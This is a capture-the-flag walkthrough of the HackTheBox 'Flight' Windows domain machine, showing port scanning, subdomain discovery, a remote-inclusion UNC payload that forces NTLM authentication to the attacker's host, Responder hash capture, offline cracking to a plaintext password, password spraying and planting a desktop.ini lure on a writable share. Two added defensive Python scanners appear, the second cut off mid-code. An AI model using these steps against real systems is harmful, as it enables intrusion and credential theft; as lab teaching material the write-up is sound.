HackThebox-Flight

He just stood on the rooftop

gazing into the distance

imagining hope

swallowing despair


Target IP: 10.129.228.120

Difficulty: Hard

Topics covered:

VHOST (virtual host) enumeration with Gobuster to breach the perimeter

Remote File Inclusion (RFI) combined with the SMB protocol to trigger NTLM authentication

Capturing an NTLMv2 hash with Responder and cracking it offline with John

SMB share enumeration and domain password spraying with NetExec (nxc)

Generating a .ini lure file with ntlm_theft for a second, interaction-free hash capture

Abusing SMB file read/write permissions to plant a webshell

Switching user identity in a restricted environment with RunasCs (the Windows equivalent of su)

Internal port discovery and building a local port-forwarding tunnel with Chisel

Identifying SeImpersonatePrivilege on the IIS process account

Kerberos fake delegation (Fake Delegation TGT) attack with Rubeus

DCSync with the Impacket suite to dump the domain admin hash, followed by Pass-the-Hash (PTH)


Port scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.228.120
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.228.120:53
Open 10.129.228.120:80
Open 10.129.228.120:445
Open 10.129.228.120:464
Open 10.129.228.120:389
Open 10.129.228.120:593
Open 10.129.228.120:636
Open 10.129.228.120:3268
Open 10.129.228.120:3269
Open 10.129.228.120:9389
Open 10.129.228.120:49667
Open 10.129.228.120:49673
Open 10.129.228.120:49674
Open 10.129.228.120:49695
Open 10.129.228.120:49723
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-18 07:26 +0000
Initiating Ping Scan at 07:26
Scanning 10.129.228.120 [4 ports]
Completed Ping Scan at 07:26, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:26
Completed Parallel DNS resolution of 1 host. at 07:26, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:26
Scanning 10.129.228.120 [15 ports]
Discovered open port 445/tcp on 10.129.228.120
Discovered open port 53/tcp on 10.129.228.120
Discovered open port 80/tcp on 10.129.228.120
Discovered open port 636/tcp on 10.129.228.120
Discovered open port 593/tcp on 10.129.228.120
Discovered open port 49673/tcp on 10.129.228.120
Discovered open port 49674/tcp on 10.129.228.120
Discovered open port 464/tcp on 10.129.228.120
Discovered open port 49723/tcp on 10.129.228.120
Discovered open port 3268/tcp on 10.129.228.120
Discovered open port 389/tcp on 10.129.228.120
Discovered open port 9389/tcp on 10.129.228.120
Discovered open port 49695/tcp on 10.129.228.120
Discovered open port 3269/tcp on 10.129.228.120
Discovered open port 49667/tcp on 10.129.228.120
Completed SYN Stealth Scan at 07:26, 1.74s elapsed (15 total ports)
Nmap scan report for 10.129.228.120
Host is up, received echo-reply ttl 127 (0.47s latency).
Scanned at 2026-06-18 07:26:19 UTC for 2s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49674/tcp open unknown syn-ack ttl 127
49695/tcp open unknown syn-ack ttl 127
49723/tcp open unknown syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
Raw packets sent: 19 (812B) | Rcvd: 16 (688B)


Visit port 80

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 10.129.228.120
<!DOCTYPE html>
<html lang="en">
<head>
<title>g0 Aviation</title>
<meta charset="utf-8">
<link rel="stylesheet" href="css/reset.css" type="text/css" media="all">
<link rel="stylesheet" href="css/layout.css" type="text/css" media="all">
<link rel="stylesheet" href="css/style.css" type="text/css" media="all">
<script type="text/javascript" src="js/jquery-1.4.2.js" ></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/cufon-replace.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_italic_600.font.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_italic_400.font.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_400.font.js"></script>
<!--[if lt IE 9]>
<script type="text/javascript" src="js/ie6_script_other.js"></script>
<script type="text/javascript" src="js/html5.js"></script>
<![endif]-->
</head>
<body id="page1">
<!-- START PAGE SOURCE -->
<div class="body1">
<div class="main">
<header>
<div class="wrapper">
<h1><a href="index.html" id="logo">g0</a><span id="slogan">International Travel</span></h1>
<div class="right">
<nav>
<ul id="top_nav">
<li><a href="#"><img src="images/img1.gif" alt=""></a></li>
<li><a href="#"><img src="images/img2.gif" alt=""></a></li>
<li class="bg_none"><a href="#"><img src="images/img3.gif" alt=""></a></li>
</ul>
</nav>
<nav>
<ul id="menu">
<li id="menu_active"><a href="index.html">Home</a></li>
<li><a href="#">Our Aircraft</a></li>
<li><a href="#">Safety</a></li>
<li><a href="#">Charters</a></li>
<li><a href="#">Contacts</a></li>
</ul>
</nav>
</div>
</div>
</header>
</div>
</div>
<div class="main">
<div id="banner">
<div class="text1"> COMFORT<span>Guaranteed</span>
<p>g0 is the world's largest aerospace company and leading manufacturer of commercial jetliners, defense, space and security systems, and service provider of aftermarket support.</p>
</div>
<a href="#" class="button_top">Order Tickets Online</a></div>
</div>
<div class="main">
<section id="content">
<article class="col1">
<div class="pad_1">
<h2>Your Flight Planner</h2>
<form id="form_1" action="#" method="post">
<div class="wrapper pad_bot1">
<div class="radio marg_right1">
<input type="radio" name="name1">
Round Trip<br>
<input type="radio" name="name1">
One Way </div>
<div class="radio">
<input type="radio" name="name1">
Empty-Leg<br>
<input type="radio" name="name1">
Multi-Leg </div>
</div>
<div class="wrapper"> Leaving From:
<div class="bg">
<input type="text" class="input input1" value="Enter City or Airport Code" onBlur="if(this.value=='') this.value='Enter City or Airport Code'" onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''">
</div>
</div>
<div class="wrapper"> Going To:
<div class="bg">
<input type="text" class="input input1" value="Enter City or Airport Code" onBlur="if(this.value=='') this.value='Enter City or Airport Code'" onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''">
</div>
</div>
<div class="wrapper"> Departure Date and Time:
<div class="wrapper">
<div class="bg left">
<input type="text" class="input input2" value="mm/dd/yyyy " onBlur="if(this.value=='') this.value='mm/dd/yyyy '" onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''">
</div>
<div class="bg right">
<input type="text" class="input input2" value="12:00am" onBlur="if(this.value=='') this.value='12:00am'" onFocus="if(this.value =='12:00am' ) this.value=''">
</div>
</div>
</div>
<div class="wrapper"> Return Date and Time:
<div class="wrapper">
<div class="bg left">
<input type="text" class="input input2" value="mm/dd/yyyy " onBlur="if(this.value=='') this.value='mm/dd/yyyy '" onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''">
</div>
<div class="bg right">
<input type="text" class="input input2" value="12:00am" onBlur="if(this.value=='') this.value='12:00am'" onFocus="if(this.value =='12:00am' ) this.value=''">
</div>
</div>
</div>
<div class="wrapper">
<p>Passenger(s):</p>
<div class="bg left">
<input type="text" class="input input2" value="# passengers" onBlur="if(this.value=='') this.value='# passengers'" onFocus="if(this.value =='# passengers' ) this.value=''">
</div>
<a href="#" class="button2">go!</a> </div>
</form>
<h2>Recent News</h2>
<p class="under"><a href="#" class="link1">Nemo enim ipsam voluptatem quia</a><br>
November 5, 2010</p>
<p class="under"><a href="#" class="link1">Voluptas aspernatur autoditaut fjugit</a><br>
November 1, 2010</p>
<p><a href="#" class="link1">Sed quia consequuntur magni</a><br>
October 23, 2010</p>
</div>
</article>
<article class="col2 pad_left1">
<h2>Welcome to our Website!</h2>
<p class="color1">As Italy's biggest manufacturing exporter, the company supports airlines and allied government customers in more than 150 countries.</p>

<div class="wrapper pad_bot2"> <a href="#" class="button1">Reservation</a> <a href="#" class="button2">Fleet</a> </div>
<div class="wrapper">
<article class="cols">
<h2>Apply to out Team!</h2>
<p><strong>We are Hiring</strong> We are looking for talented engineers specializing in aeronautics. Quick apply to our team by going to the contact page.</p>
</article>
<div class="box1">
<div class="pad_1">
<div class="wrapper">
</div>
</div>
</div>
</div>
</article>
</section>
</div>
<div class="body2">
<div class="main">
<footer>
<div class="footerlink">
<p class="lf">Copyright 2022 <a href="#">flight.htb</a> - All Rights Reserved</p>
<p class="rf">Designed by <a href="https://twitter.com/Geiseric4" class="twitter">Geiseric</a> & <a href="https://twitter.com/Janit10043163" class="twitter">JDgodd</a></p>
<div style="clear:both;"></div>
</div>
</footer>
</div>
</div>
<script type="text/javascript"> Cufon.now(); </script>
<!-- END PAGE SOURCE -->
</body>
</html>

Add the domain name flight.htb (seen in the page footer) to the hosts file

Enumerate subdomains

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://flight.htb/ --append-domain -t 25 -k | grep -v "302"
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://flight.htb/
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
[ERROR] error on word web: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word portal: timeout occurred during the request
[ERROR] error on word server: timeout occurred during the request
[ERROR] error on word sip: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word wordpress: timeout occurred during the request
[ERROR] error on word images8: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word cas: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word origin-www: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word cisco: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word banner: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word mercury: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word w: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
school.flight.htb Status: 200 [Size: 3996]

Add it to the hosts file as well and visit it

http://school.flight.htb/index.php?view=home.html

Note the view parameter

Try local file inclusion

It fails

Try remote file inclusion

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

It occurred to me that Responder might be able to capture a hash from this

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# responder -I tun0 -Pdv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|


[*] Tips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
DHCPv6 [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.31]
Responder IPv6 [fe80::2549:a32b:73b5:da30]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-GE07T71GBKY]
Responder Domain Name [HF3Y.LOCAL]
Responder DCE-RPC Port [49830]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

http://school.flight.htb/index.php?view=//10.10.14.31/kali
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo responder -I tun0 -Pdv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|


[*] Tips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
DHCPv6 [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.31]
Responder IPv6 [fe80::2549:a32b:73b5:da30]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-E61L294M4DH]
Responder Domain Name [D0VM.LOCAL]
Responder DCE-RPC Port [48269]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:fcae80b4929051aa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
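From the defender's side, the same request pattern is easy to spot in the Apache access log. The following is an added example, not code from the box or the original post; it assumes a small allowlist of includable pages and runs over constructed log lines whose view values mirror the probes above:

```python
"""Flag index.php?view= values that point outside the intended include set.

Added example for this writeup, not code from the box or the original post.
The access-log lines are constructed (Apache combined format); the view values
mirror the LFI/RFI probes from the writeup, and the allowlist is assumed.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines for school.flight.htb.
SAMPLE_LOG = """\
10.10.14.31 - - [18/Jun/2026:07:30:01 +0000] "GET /index.php?view=home.html HTTP/1.1" 200 3996 "-" "curl/8.0"
10.10.14.31 - - [18/Jun/2026:07:31:12 +0000] "GET /index.php?view=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 3996 "-" "curl/8.0"
10.10.14.31 - - [18/Jun/2026:07:32:45 +0000] "GET /index.php?view=http://10.10.14.31/shell.txt HTTP/1.1" 200 3996 "-" "curl/8.0"
10.10.14.31 - - [18/Jun/2026:07:33:09 +0000] "GET /index.php?view=//10.10.14.31/kali HTTP/1.1" 200 3996 "-" "curl/8.0"
10.10.14.31 - - [18/Jun/2026:07:34:00 +0000] "GET /index.php?view=about.html HTTP/1.1" 200 3996 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The only pages index.php should ever include (assumed for this example).
# The fix on the application side is the same idea: map the parameter onto
# this set and refuse anything else, instead of passing it to include().
ALLOWED_VIEWS = {"home.html", "about.html", "blog.html"}

SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://")
DRIVE_RE = re.compile(r"^[a-z]:/")


def classify_view(value: str) -> Optional[str]:
    """Return a finding label for one view value, or None if it is benign."""
    v = unquote(value).replace("\\", "/")
    low = v.lower()
    # Order matters: a UNC path also looks like an absolute path.
    if v.startswith("//") or low.startswith(("file:", "smb:")):
        return "UNC/SMB path (forces an outbound NTLM authentication)"
    if SCHEME_RE.match(low):
        return "remote URL (RFI)"
    if "../" in v or v.startswith("/") or DRIVE_RE.match(low):
        return "traversal or absolute path (LFI)"
    if v not in ALLOWED_VIEWS:
        return "view not in allowlist"
    return None


def scan_log(text: str) -> List[dict]:
    """Parse combined-format lines and report suspicious view parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get("view", []):
            reason = classify_view(value)
            if reason:
                findings.append({"ip": m["ip"], "ts": m["ts"],
                                 "view": unquote(value), "reason": reason})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} view={hit['view']!r}: {hit['reason']}")
```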

Crack it with John

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "" > hash.txt

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim hash.txt

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13 (svc_apache)
1g 0:00:00:21 DONE (2026-06-18 07:53) 0.04712g/s 502541p/s 502541c/s 502541C/s SADSAM..S42150461
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

This yields the credentials svc_apache:S@Ss!K@*t13

Probe SMB permissions

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13'
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13

Try listing shares and users

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13' --users
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.228.120 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.129.228.120 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.228.120 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.129.228.120 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.129.228.120 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.129.228.120 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.129.228.120 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.129.228.120 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.129.228.120 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.129.228.120 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.129.228.120 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.129.228.120 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.129.228.120 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.129.228.120 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.129.228.120 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.129.228.120 445 G0 [*] Enumerated 15 local users: flight

Run a round of password spraying

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat users.txt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
O.Possum
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u users.txt -p 'S@Ss!K@*t13'
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'S.Moon' -p 'S@Ss!K@*t13' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ

This user has write permission on one share (Shared).

Use Greenwolf/ntlm_theft (a tool by Jacob Wilkin/Greenwolf for generating multiple types of NTLMv2 hash theft files) to generate lure files and try to obtain an NTLM hash.

┌──(root㉿kaada)-[/opt]
└─# git clone https://github.com/Greenwolf/ntlm_theft.git
Cloning into 'ntlm_theft'...
remote: Enumerating objects: 151, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 151 (delta 31), reused 24 (delta 24), pack-reused 113 (from 1)
Receiving objects: 100% (151/151), 2.12 MiB | 52.00 KiB/s, done.
Resolving deltas: 100% (73/73), done.

┌──(root㉿kaada)-[/opt/ntlm_theft]
└─# python3 ntlm_theft.py --generate all --server 10.10.14.31 --filename exploit
/opt/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: exploit/exploit.scf (BROWSE TO FOLDER)
Created: exploit/exploit-(url).url (BROWSE TO FOLDER)
Created: exploit/exploit-(icon).url (BROWSE TO FOLDER)
Created: exploit/exploit.lnk (BROWSE TO FOLDER)
Created: exploit/exploit.rtf (OPEN)
Created: exploit/exploit-(stylesheet).xml (OPEN)
Created: exploit/exploit-(fulldocx).xml (OPEN)
Created: exploit/exploit.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: exploit/exploit-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: exploit/exploit-(includepicture).docx (OPEN)
Created: exploit/exploit-(remotetemplate).docx (OPEN)
Created: exploit/exploit-(frameset).docx (OPEN)
Created: exploit/exploit-(externalcell).xlsx (OPEN)
Created: exploit/exploit.wax (OPEN)
Created: exploit/exploit.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: exploit/exploit.asx (OPEN)
Created: exploit/exploit.jnlp (OPEN)
Created: exploit/exploit.application (DOWNLOAD AND OPEN)
Created: exploit/exploit.pdf (OPEN AND ALLOW)
Created: exploit/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: exploit/exploit.library-ms (BROWSE TO FOLDER)
Created: exploit/Autorun.inf (BROWSE TO FOLDER)
Created: exploit/desktop.ini (BROWSE TO FOLDER)
Created: exploit/exploit.theme (THEME TO INSTALL
Generation Complete.

┌──(root㉿kaada)-[/opt/ntlm_theft]
└─# cd exploit

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \exploit.m3u
smb: \> put desktop.ini
putting file desktop.ini as \desktop.ini (0.1 kB/s) (average 0.1 kB/s)
smb: \>

Responder successfully captured a hash

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo responder -I tun0 -Pdv

__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|


[*] Tips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
DHCPv6 [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.31]
Responder IPv6 [fe80::2549:a32b:73b5:da30]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-ZI44R4LFFPC]
Responder Domain Name [NTW5.LOCAL]
Responder DCE-RPC Port [45802]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:ddc9affd6aef244a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
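A writable share is exactly where a defender should look for files like this desktop.ini, which Explorer resolves without anyone opening them. The following scanner is an added example (not part of ntlm_theft or the original post): it walks a directory (for instance a copy of the Shared share), parses the INI-style formats that auto-fetch icons (desktop.ini, autorun.inf, .scf, .url), and reports any UNC or file:// reference to a host outside a trusted set. The share contents are constructed in a temporary directory; 10.10.14.31 is the attacker IP from the writeup and dc01 is an assumed internal name.

```python
"""Find share files whose icon/URL keys point at an untrusted host.

Added example for this writeup; not code from ntlm_theft or the original post.
The sample share is constructed in a temp directory so the script runs offline.
"""
import os
import re
import tempfile
from typing import List, Optional, Set

# INI-style files that Explorer parses automatically when a folder is listed,
# and the keys inside them that trigger a network fetch (and an NTLM logon).
AUTO_FETCH_NAMES = {"desktop.ini", "autorun.inf"}
AUTO_FETCH_EXTS = {".scf", ".url"}
AUTO_FETCH_KEYS = {"iconresource", "iconfile", "icon", "url", "workingdirectory"}

UNC_RE = re.compile(r"\\\\([^\\\s,]+)")                 # \\host\share\...
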